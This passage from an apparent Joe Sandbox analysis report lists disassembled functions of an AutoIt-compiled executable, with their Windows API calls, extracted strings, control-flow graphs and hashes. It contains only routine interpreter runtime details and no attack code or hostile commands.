                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                    • API String ID: 0-1645009161
                                                                                                    • Opcode ID: 561603c6243034574f5ff7e391276d3487052bdf833274ecd1339276e926e7bd
                                                                                                    • Instruction ID: 268b320cdc3de70687cd1117b2b7bfcdf4d2e9258c04dab5f456399303ce1560
                                                                                                    • Opcode Fuzzy Hash: 561603c6243034574f5ff7e391276d3487052bdf833274ecd1339276e926e7bd
                                                                                                    • Instruction Fuzzy Hash: E781F671A44205BBDF21AF64DC42FEE3BB8AF29750F048024F909AB197EB70DA51D791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017EDFE Relevance: 21.6, APIs: 14, Instructions: 616windowsleeptimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 0017EEB7
                                                                                                    • timeGetTime.WINMM ref: 0017F0B7
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017F1D8
                                                                                                    • TranslateMessage.USER32(?), ref: 0017F22B
                                                                                                    • DispatchMessageW.USER32(?), ref: 0017F239
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017F24F
                                                                                                    • Sleep.KERNELBASE(0000000A), ref: 0017F261
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189390790-0
                                                                                                    • Opcode ID: 13c74c600f089690bc0a7e3d35189909d8d704363576e23d6c2cc4cdf0148dd1
                                                                                                    • Instruction ID: eadbaeec70a85aed8ce285462194daf8f309f9a667698dee49f4f98c4636be55
                                                                                                    • Opcode Fuzzy Hash: 13c74c600f089690bc0a7e3d35189909d8d704363576e23d6c2cc4cdf0148dd1
                                                                                                    • Instruction Fuzzy Hash: 1732BC70608341DFDB28CB24C848FAAB7F5BFA5304F54856DF46987292C771E989CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00173696 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 483 173696-1736ab 484 1736ad-1736b0 483->484 485 17370b-17370d 483->485 486 1736b2-1736b9 484->486 487 173711 484->487 485->484 488 17370f 485->488 491 1736bf-1736c4 486->491 492 17378b-173793 PostQuitMessage 486->492 489 173717-17371c 487->489 490 1b3dce-1b3df6 call 172f24 call 18f1c6 487->490 493 1736f6-1736fe DefWindowProcW 488->493 494 173743-17376a SetTimer RegisterWindowMessageW 489->494 495 17371e-173721 489->495 529 1b3dfb-1b3e02 490->529 496 1b3e3b-1b3e4f call 1dc80c 491->496 497 1736ca-1736ce 491->497 500 17373f-173741 492->500 499 173704-17370a 493->499 494->500 503 17376c-173777 CreatePopupMenu 494->503 501 173727-17373a KillTimer call 17388e call 17572c 495->501 502 1b3d6f-1b3d72 495->502 496->500 522 1b3e55 496->522 504 173795-17379f call 18fcbb 497->504 505 1736d4-1736d9 497->505 500->499 501->500 508 1b3daa-1b3dc9 MoveWindow 502->508 509 1b3d74-1b3d78 502->509 503->500 524 1737a4 504->524 511 1736df-1736e4 505->511 512 1b3e20-1b3e27 505->512 508->500 516 1b3d7a-1b3d7d 509->516 517 1b3d99-1b3da5 SetFocus 509->517 520 1736ea-1736f0 511->520 521 173779-173789 call 1737a6 511->521 512->493 519 1b3e2d-1b3e36 call 1d1367 512->519 516->520 525 1b3d83-1b3d94 call 172f24 516->525 517->500 519->493 520->493 520->529 521->500 522->493 524->500 525->500 529->493 533 1b3e08-1b3e1b call 17388e call 1738f2 529->533 533->493
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00173690,?,?), ref: 001736FE
                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00173690,?,?), ref: 0017372A
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0017374D
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00173690,?,?), ref: 00173758
                                                                                                    • CreatePopupMenu.USER32 ref: 0017376C
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0017378D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                    • String ID: 0$$$0$$$TaskbarCreated
                                                                                                    • API String ID: 129472671-621057671
                                                                                                    • Opcode ID: acd5054471446eb338446a3259c9b4846a1c29264318ee9a527451709b7cb34e
                                                                                                    • Instruction ID: 1535ebc7a3759368c422e0e2784bdb624c330f14b10df1cef807656fcbcd59b2
                                                                                                    • Opcode Fuzzy Hash: acd5054471446eb338446a3259c9b4846a1c29264318ee9a527451709b7cb34e
                                                                                                    • Instruction Fuzzy Hash: 7A4148B5214241FBDB2C2F78EC0EBB93A75E715310F808225F5398A2A1CB749B05B711
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001735AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 001735DE
                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00173608
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00173619
                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00173636
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00173646
                                                                                                    • LoadIconW.USER32(000000A9), ref: 0017365C
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0017366B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                    • Opcode ID: f857cf2ecef503221fdd18f73a161714e206bd5391848a3a21040da065a266f9
                                                                                                    • Instruction ID: 2a398fee4b1dd427ff2adb08ed4317daa0c808c9c90b147f5dd7902192374a14
                                                                                                    • Opcode Fuzzy Hash: f857cf2ecef503221fdd18f73a161714e206bd5391848a3a21040da065a266f9
                                                                                                    • Instruction Fuzzy Hash: E621E2B9902308EFDB009FE5E889B9DBBB4FB09700F10411AF515A62A1D7B445458F91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001B09FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 540 1b09fb-1b0a2b call 1b07cf 543 1b0a2d-1b0a38 call 19f656 540->543 544 1b0a46-1b0a52 call 1a55b1 540->544 549 1b0a3a-1b0a41 call 19f669 543->549 550 1b0a6b-1b0ab4 call 1b073a 544->550 551 1b0a54-1b0a69 call 19f656 call 19f669 544->551 560 1b0d1d-1b0d23 549->560 558 1b0b21-1b0b2a GetFileType 550->558 559 1b0ab6-1b0abf 550->559 551->549 564 1b0b2c-1b0b5d GetLastError call 19f633 CloseHandle 558->564 565 1b0b73-1b0b76 558->565 562 1b0ac1-1b0ac5 559->562 563 1b0af6-1b0b1c GetLastError call 19f633 559->563 562->563 569 1b0ac7-1b0af4 call 1b073a 562->569 563->549 564->549 579 1b0b63-1b0b6e call 19f669 564->579 567 1b0b78-1b0b7d 565->567 568 1b0b7f-1b0b85 565->568 572 1b0b89-1b0bd7 call 1a54fa 567->572 568->572 573 1b0b87 568->573 569->558 569->563 582 1b0bd9-1b0be5 call 1b094b 572->582 583 1b0be7-1b0c0b call 1b04ed 572->583 573->572 579->549 582->583 589 1b0c0f-1b0c19 call 1a8a3e 582->589 590 1b0c1e-1b0c61 583->590 591 1b0c0d 583->591 589->560 592 1b0c63-1b0c67 590->592 593 1b0c82-1b0c90 590->593 591->589 592->593 595 1b0c69-1b0c7d 592->595 596 1b0d1b 593->596 597 1b0c96-1b0c9a 593->597 595->593 596->560 597->596 599 1b0c9c-1b0ccf CloseHandle call 1b073a 597->599 602 1b0d03-1b0d17 599->602 603 1b0cd1-1b0cfd GetLastError call 19f633 call 1a56c3 599->603 602->596 603->602
                                                                                                    APIs
                                                                                                      • Part of subcall function 001B073A: CreateFileW.KERNELBASE(00000000,00000000,?,001B0AA4,?,?,00000000,?,001B0AA4,00000000,0000000C), ref: 001B0757
                                                                                                    • GetLastError.KERNEL32 ref: 001B0B0F
                                                                                                    • __dosmaperr.LIBCMT ref: 001B0B16
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 001B0B22
                                                                                                    • GetLastError.KERNEL32 ref: 001B0B2C
                                                                                                    • __dosmaperr.LIBCMT ref: 001B0B35
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001B0B55
                                                                                                    • CloseHandle.KERNEL32(?), ref: 001B0C9F
                                                                                                    • GetLastError.KERNEL32 ref: 001B0CD1
                                                                                                    • __dosmaperr.LIBCMT ref: 001B0CD8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: 4f8c2be8495621b3d288945b1cdebab834214baafd9a8e90d1b69807f338557e
                                                                                                    • Instruction ID: 19c4eac10314e96cadc64f764dabebbce25ae5065e3e8f104e5d9f1a3f9f23f2
                                                                                                    • Opcode Fuzzy Hash: 4f8c2be8495621b3d288945b1cdebab834214baafd9a8e90d1b69807f338557e
                                                                                                    • Instruction Fuzzy Hash: B9A12736A042049FDF1AAFB8D896BEE7BA0EB1A324F14015DF815DB2D1DB309953CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0017551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00175539
                                                                                                      • Part of subcall function 001751BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001751E1
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0017534B
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001B4BD7
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001B4C18
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001B4C5A
                                                                                                    • _wcslen.LIBCMT ref: 001B4CC1
                                                                                                    • _wcslen.LIBCMT ref: 001B4CD0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                    • API String ID: 98802146-2727554177
                                                                                                    • Opcode ID: be43573cf3b2c177ef0a8cb4e4ee57c88c9bc4fe81b5a5112c6e18fb8e5d01b3
                                                                                                    • Instruction ID: 719d5f4256833686e6c29d29b52d80db8d95f650d7606ed2fd99c67826d76897
                                                                                                    • Opcode Fuzzy Hash: be43573cf3b2c177ef0a8cb4e4ee57c88c9bc4fe81b5a5112c6e18fb8e5d01b3
                                                                                                    • Instruction Fuzzy Hash: B6718C715053009FC714EF65E8899ABBFF8FFAA750F40446EF449871A2EB709A48CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00173465
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00173474
                                                                                                    • LoadIconW.USER32(00000063), ref: 0017348A
                                                                                                    • LoadIconW.USER32(000000A4), ref: 0017349C
                                                                                                    • LoadIconW.USER32(000000A2), ref: 001734AE
                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001734C6
                                                                                                    • RegisterClassExW.USER32(?), ref: 00173517
                                                                                                      • Part of subcall function 001735AB: GetSysColorBrush.USER32(0000000F), ref: 001735DE
                                                                                                      • Part of subcall function 001735AB: RegisterClassExW.USER32(00000030), ref: 00173608
                                                                                                      • Part of subcall function 001735AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00173619
                                                                                                      • Part of subcall function 001735AB: InitCommonControlsEx.COMCTL32(?), ref: 00173636
                                                                                                      • Part of subcall function 001735AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00173646
                                                                                                      • Part of subcall function 001735AB: LoadIconW.USER32(000000A9), ref: 0017365C
                                                                                                      • Part of subcall function 001735AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0017366B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                    • API String ID: 423443420-4155596026
                                                                                                    • Opcode ID: 16de36782d0e59904e4753d09fdcb2a549f0f07d451ad1f1bd1708f3c3d2ffd7
                                                                                                    • Instruction ID: 7a56b911b2e7235871607a691861258c65ff9b11eda235cf5bbcd041ffa57066
                                                                                                    • Opcode Fuzzy Hash: 16de36782d0e59904e4753d09fdcb2a549f0f07d451ad1f1bd1708f3c3d2ffd7
                                                                                                    • Instruction Fuzzy Hash: 43215078D01314EBDB109FA6FC4DBA9BFB8FB09B50F40405AF504A62A1D3B94589CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017CA50 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 0017CE8E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: p3$$p3$$p3$$p3$$p5$$p5$$x3$$x3$
                                                                                                    • API String ID: 1385522511-1470810328
                                                                                                    • Opcode ID: 7a9a4ce36e3248d78d938b3f062e807592959fd9a36ea83b7892c8993e11de44
                                                                                                    • Instruction ID: fad5bfd8462335854e2be89ea95d86992d897e982f3a565c888f83180ed47b32
                                                                                                    • Opcode Fuzzy Hash: 7a9a4ce36e3248d78d938b3f062e807592959fd9a36ea83b7892c8993e11de44
                                                                                                    • Instruction Fuzzy Hash: EE328D75A00205AFDB28CF58C885FBABBB5EF56354F25805DE809AB252C774EE41CBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00173AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 888 173aa3-173ac6 889 1b4139-1b414c call 1da12a 888->889 890 173acc-173b35 call 19019b call 177953 call 17bf07 call 177953 * 2 call 176e52 888->890 896 1b4153-1b415b 889->896 924 1b456b-1b457b call 1da12a 890->924 925 173b3b-173b48 call 176cce call 176b12 890->925 898 1b416b-1b4173 896->898 899 1b415d-1b4165 896->899 902 1b417e-1b4186 898->902 903 1b4175-1b417c 898->903 899->898 901 173b64-173bd3 call 17bf07 call 173a70 call 17bf07 call 17557e call 1741c9 call 176bfa 899->901 938 173bd9-173c48 call 17bf07 * 2 call 17694e call 177af4 SetCurrentDirectoryW call 17bd2c * 2 call 19019b call 1741a6 901->938 939 1b41b4-1b41bf 901->939 907 1b4188-1b418f 902->907 908 1b4191-1b4199 902->908 906 1b41a6-1b41af call 1dd4bf 903->906 906->901 907->906 908->901 911 1b419f-1b41a1 908->911 911->906 931 1b4580 924->931 935 173b4d-173b5e call 176afb 925->935 931->931 935->896 935->901 985 173c4c-173c51 938->985 939->938 941 1b41c5-1b41f8 call 177953 call 17636d 939->941 951 1b41fe-1b4225 call 1e35cd call 1763db 941->951 952 1b4502-1b4519 call 1da12a 941->952 951->952 966 1b422b-1b42a7 call 19016b call 17bc23 call 17bb3d 951->966 961 173da5-173df0 call 17bd2c * 2 call 177953 call 17bd2c call 177953 call 1901a4 952->961 987 1b446f-1b44ab call 17bc23 call 1e13a0 call 1d4a0c call 194d0e 966->987 988 1b42ad-1b42cf call 17bc23 966->988 989 173c57-173c64 call 17ad74 985->989 990 173d71-173d92 call 177953 SetCurrentDirectoryW 985->990 1040 1b44ad-1b44d2 call 175c10 call 1901a4 call 1e1388 987->1040 1005 1b42d1-1b42e0 988->1005 1006 1b42e5-1b42f0 call 1e14a6 988->1006 989->990 1007 173c6a-173c86 call 174093 call 173ff3 989->1007 990->961 1002 173d94-173da2 call 19015d call 1901a4 990->1002 1002->961 1010 1b4401-1b4414 call 17bb3d 1005->1010 1022 1b430d-1b4318 call 1e1492 1006->1022 1023 1b42f2-1b4308 1006->1023 1030 1b454e-1b4566 call 1da12a 1007->1030 1031 173c8c-173ca3 call 173fb8 call 194cf3 1007->1031 1010->988 1028 1b441a-1b4424 1010->1028 1036 1b431a-1b4329 1022->1036 1037 1b432e-1b4339 call 18e607 1022->1037 1023->1010 1033 1b4457 call 1da486 1028->1033 1034 1b4426-1b4434 1028->1034 1030->990 1056 173cc6-173cc9 1031->1056 1057 173ca5-173cc0 call 196755 1031->1057 1042 1b445c-1b4469 1033->1042 1034->1033 1041 1b4436-1b4455 call 1740e0 1034->1041 1036->1010 1037->1010 1052 1b433f-1b435b call 1d9f0d 1037->1052 1040->961 1041->1042 1042->987 1042->988 1066 1b438a-1b438d 1052->1066 1067 1b435d-1b4388 call 17b25f call 17bd2c 1052->1067 1062 173df3-173df9 1056->1062 1063 173ccf-173cd4 1056->1063 1057->1056 1057->1062 1062->1063 1065 173dff-1b452a 1062->1065 1069 1b452f-1b4537 call 1d9dd5 1063->1069 1070 173cda-173d13 call 17b25f call 173e15 1063->1070 1065->1063 1071 1b43c9-1b43cc 1066->1071 1072 1b438f-1b43b5 call 17b25f call 177d27 call 17bd2c 1066->1072 1111 1b43b6-1b43c7 call 17bc23 1067->1111 1087 1b453c-1b453f 1069->1087 1095 173d15-173d2c call 1901a4 call 19015d 1070->1095 1096 173d30-173d32 1070->1096 1079 1b43ce-1b43d7 call 1d9e3c 1071->1079 1080 1b43ed-1b43f1 call 1e142e 1071->1080 1072->1111 1100 1b43dd-1b43e8 call 1901a4 1079->1100 1101 1b44d7-1b4500 call 1da12a call 1901a4 call 194d0e 1079->1101 1090 1b43f6-1b4400 call 1901a4 1080->1090 1093 1b4545-1b4549 1087->1093 1094 173e08-173e10 1087->1094 1090->1010 1093->1094 1105 173d5e-173d6b 1094->1105 1095->1096 1108 173e04 1096->1108 1109 173d38-173d3b 1096->1109 1100->988 1101->1040 1105->985 1105->990 1108->1094 1109->1094 1116 173d41-173d44 1109->1116 1111->1090 1116->1087 1120 173d4a-173d59 call 1740e0 1116->1120 1120->1105
                                                                                                    APIs
                                                                                                      • Part of subcall function 00177953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,001B3A1C), ref: 00177973
                                                                                                      • Part of subcall function 00176E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00173B33,?,00008000), ref: 00176E80
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00173C17
                                                                                                    • _wcslen.LIBCMT ref: 00173C96
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00173D81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                    • API String ID: 2701412040-3738523708
                                                                                                    • Opcode ID: 66ea8c92fa53fbc390cdbdb9d8b9e57b186c76e64486fbe1c5d3f3536243fafc
                                                                                                    • Instruction ID: ede193de2bf07a27c076159a4b3fdf223442149fcb71cc83abaf79a449e82a81
                                                                                                    • Opcode Fuzzy Hash: 66ea8c92fa53fbc390cdbdb9d8b9e57b186c76e64486fbe1c5d3f3536243fafc
                                                                                                    • Instruction Fuzzy Hash: A022B1705083409FC725EF64C881AAFBBF5BFA9314F14891DF499932A2DB70DA48DB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017F680 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
